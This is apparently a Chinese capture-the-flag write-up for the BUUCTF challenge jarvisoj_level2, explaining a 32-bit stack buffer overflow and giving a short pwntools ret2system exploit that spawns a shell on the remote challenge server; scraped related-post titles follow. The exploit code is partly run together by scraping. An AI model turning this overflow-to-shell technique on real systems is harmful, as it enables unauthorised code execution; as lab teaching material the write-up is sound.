[BUUCTF]PWN16——jarvisoj_level2
[BUUCTF]PWN16——jarvisoj_level2
附件
步骤
例行检查,32位,开启了nx保护
试运行一下程序
32位ida载入,shift+f12查看一下程序里的字符串,发现了system函数和 /bin/sh 字符串
双击跟进,ctrl+x本想查看调用该字符串的函数的,没有找到,但是程序里有这些字符串的位置,
shell_addr=0x804a024
system_addr=0x8048320
我们可以直接利用这些构造 system(/bin/sh)去执行
跟进试运行时候看到的字符串,找到输入点
buf的大小是0x88,读入的数据大小是0x100,可以溢出0x78个字节,用来构造rop足够
EXP:
from pwn import*r=remote('node3.buuoj.cn',26675)
shell_addr=0x804a024
system=0x8048320payload='a'*(0x88+4)+p32(system)+p32(8)+p32(shell_addr)r.sendline(payload)
r.interactive()
[BUUCTF]PWN16——jarvisoj_level2相关推荐
- buuctf jarvisoj_level2 wp
前期准备 checksec.file等流程 就开了个nx,也就是不准植入shellcode而已 看看ida 有sh字符串,点进去就能得到地址0x0804a024 主函数中能很明显发现有system函数 ...
- 持续更新 BUUCTF——PWN(一)
文章目录 前言 test_your_nc rip warmup_csaw_2016 ciscn_2019_n_1 pwn1_sctf_2016 jarvisoj_level0 [第五空间2019 决赛 ...
- [BUUCTF]PWN17——[HarekazeCTF2019]baby_rop
[BUUCTF]PWN17--[HarekazeCTF2019]baby_rop 附件 步骤: 例行检查,64位,开启了NX保护 试运行一下程序,看这个情况,当我们输入太长字符串的时候会报错 64位i ...
- BUUCTF的Web真题学习整理(一)
目录 WEB1-WarmUp (任意文件包含漏洞) WEB2-高明的黑客(fuzz脚本) WEB3-easy_tornado (服务端模板注入(ssti攻击)) WEB4-Hack World(时间盲 ...
- [BUUCTF-pwn]——jarvisoj_level2
[BUUCTF-pwn]--jarvisoj_level2 题目地址:https://buuoj.cn/challenges#jarvisoj_level2 checksec 一下下, 32程序 ID ...
- BUUCTF寒假刷题-Web
前言 寒假横向刷题(尽量) BUUCTF
- BUUCTF之[Zer0pts2020]Can you guess it? basename函数绕过
BUUCTF之[Zer0pts2020]Can you guess it? basename函数绕过 题目 后台PHP源码: <?php include 'config.php'; // FLA ...
- BUUCTF刷题笔记
BUUCTF刷题笔记 [极客大挑战 2019]BabySQL 从这句话我们可以看出,这个网站的后台是做了过滤处理的 这个时候我们先用万能密码实验一下看看,是什么类型的SQL注入 输入1',看看返回的结 ...
- BUUCTF Quoted-printable编码
Quoted-printable可译为"可打印字符引用编码",编码常用在电子邮件中,如:Content-Transfer-Encoding: quoted-printable ,它 ...
最新文章
- Go 学习笔记(5)— 算术运算符、关系运算符、逻辑运算符、位运算符、赋值运算符、取地址和指针运算符
- 【LeetCode160】相交链表
- 【CodeForces - 122B 】Lucky Substring (字符串,水题)
- Windows下的SQL Server备份文件BAK在Linux环境下还原遇到的问题
- Win10下Eclipse运行环境的安装
- android真机调试
- RubyonRails是WebDev最佳选择的5个原因
- 桌面图标有蓝底怎么办?
- 常用的计算机硬件软件英语,计算机英语常用词汇.ppt
- 50行实现C语言FM收音机-Taskbus Stdio封装器在SDR课程中的应用
- 国内主流加密芯片分析
- 从实验室研发到大规模生产 纳晶科技量子点技术商用多点开花
- android6.0 Bluetooth蓝牙源码流程笔记
- Python练习14:天天向上的力量I
- 逆向路径转发 linux,RPF(Reverse Path Forwarding 反向路径转发)技术
- k8s:kubeadm搭建k8s集群,加入新master节点报错
- 如果你想通过自媒体赚钱,平台规则必须了如指掌,才能月入10W+
- cbc系统是指_制动力分配(EBD/CBC等)
- 新人要怎么快速适应融入工作呢?
- Part4 大型総合スーパー編(1)---業務プロセスを理解する
热门文章
- 文本情感分析综述[哈工大2010]笔记
- SpringBoo Mybatis Druid配置多数据源
- 安装nvida-docker2
- mysql中autocommit,start transaction和begin/commit的异同
- terraform笔记
- 秒懂边缘云 | 3场直播带你了解下个技术风口
- 乔布斯 :斯坦福大学演讲
- 大数据项目之数据采集总结(三)
- Springboot整合squirrel-foundation状态机
- 天龙八部怎么找不到服务器,win7系统天龙八部无法打开服务器列表的解决方法...